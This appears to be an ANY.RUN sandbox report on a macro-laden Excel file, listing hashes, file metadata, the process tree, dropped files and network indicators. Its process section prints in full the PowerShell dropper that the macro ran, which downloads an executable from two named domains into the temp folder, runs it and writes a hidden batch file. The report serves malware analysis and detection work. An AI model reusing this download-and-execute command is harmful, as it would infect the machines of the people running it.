analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

78d8c19e35fd239c7237049e6dd6225379991e67771412d4ab9edd73ca17db00.xls

Full analysis: https://app.any.run/tasks/a3ae8ece-c86a-4261-9cb0-b96634ce8c96
Verdict: Malicious activity
Analysis date: April 15, 2019, 01:43:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: 12345, Last Saved By: user, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Oct 16 17:44:32 2018, Last Saved Time/Date: Thu Nov 22 11:00:33 2018, Security: 0
MD5:

51751DE29DBAC9A5AAB2445DB21C6768

SHA1:

7F1B3E366E52888B827D33C05D508DA2DA0B7419

SHA256:

78D8C19E35FD239C7237049E6DD6225379991E67771412D4AB9EDD73CA17DB00

SSDEEP:

1536:XxZ+RwPONXoRjDhIcp0fDlaGGx+cL26nA72IBFKZqdSSSak8GZ0m7:XxZ+RwPONXoRjDhIcp0fDlaGGx+cL26D

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2984)
      • cmd.exe (PID: 2456)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2812)
    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2812)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3460)
      • powershell.exe (PID: 3568)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3460)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2812)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

CompObjUserType: Microsoft Office Excel 2003 Worksheet
CompObjUserTypeLen: 38
HeadingPairs:
  • Worksheets
  • 3
TitleOfParts:
  • Sheet1
  • Sheet2
  • Sheet3
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2018:11:22 11:00:33
CreateDate: 2018:10:16 16:44:32
Software: Microsoft Excel
LastModifiedBy: user
Author: 12345
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
5
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2812"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2984cmd /c powershell "'powershell ""<#main sub #>function putstr([string] $wstr){(new-object system.net.webclient).downloadfile($wstr,''%tmp%\tmp633.exe'');<#update data#>start-process ''%tmp%\tmp633.exe'';}try{putstr(''https://www.pronetworksgroup.com/ruby.suby'')}catch{putstr(''http://oasincorp.com/ruby.suby'')}'"" | out-file -encoding ascii -filepath %tmp%\tmp408.bat; start-process '%tmp%\tmp408.bat' -windowstyle hidden"C:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3460powershell "'powershell ""<#main sub #>function putstr([string] $wstr){(new-object system.net.webclient).downloadfile($wstr,''C:\Users\admin\AppData\Local\Temp\tmp633.exe'');<#update data#>start-process ''C:\Users\admin\AppData\Local\Temp\tmp633.exe'';}try{putstr(''https://www.pronetworksgroup.com/ruby.suby'')}catch{putstr(''http://oasincorp.com/ruby.suby'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\tmp408.bat; start-process 'C:\Users\admin\AppData\Local\Temp\tmp408.bat' -windowstyle hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2456cmd /c ""C:\Users\admin\AppData\Local\Temp\tmp408.bat" "C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3568powershell "<#main sub #>function putstr([string] $wstr){(new-object system.net.webclient).downloadfile($wstr,'C:\Users\admin\AppData\Local\Temp\tmp633.exe');<#update data#>start-process 'C:\Users\admin\AppData\Local\Temp\tmp633.exe';}try{putstr('https://www.pronetworksgroup.com/ruby.suby')}catch{putstr('http://oasincorp.com/ruby.suby')}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 287
Read events
1 065
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
1
Unknown types
1

Dropped files

PID
Process
Filename
Type
2812EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRFBFC.tmp.cvr
MD5:
SHA256:
3460powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MLI96FPT0VJW95WE2OFK.temp
MD5:
SHA256:
3568powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P9CUF6J15CUFZ2MFFXHD.temp
MD5:
SHA256:
3460powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF130504.TMPbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
2812EXCEL.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:D6489F426EFCA743F6BE68B95246096E
SHA256:F09AD2FD219D4F8F05E37EF5368AFEE2E1AA3D9E4AF2D39A632FAFDB12594E1B
3568powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
3568powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13092b.TMPbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
3460powershell.exeC:\Users\admin\AppData\Local\Temp\tmp408.battext
MD5:D454DD8CA2915FADAB1EA6C292A6996F
SHA256:D477A9A3852C19E1AD652572BCD35CF29C282F3D2452B2A2AD3F1B124A671AE9
3460powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3568
powershell.exe
GET
404
45.60.22.183:80
http://oasincorp.com/ruby.suby
US
html
1.12 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3568
powershell.exe
190.8.176.86:443
www.pronetworksgroup.com
Colombia Hosting
CO
unknown
3568
powershell.exe
45.60.22.183:80
oasincorp.com
Incapsula Inc
US
unknown

DNS requests

Domain
IP
Reputation
www.pronetworksgroup.com
  • 190.8.176.86
unknown
oasincorp.com
  • 45.60.22.183
  • 45.60.25.183
malicious

Threats

No threats detected
No debug info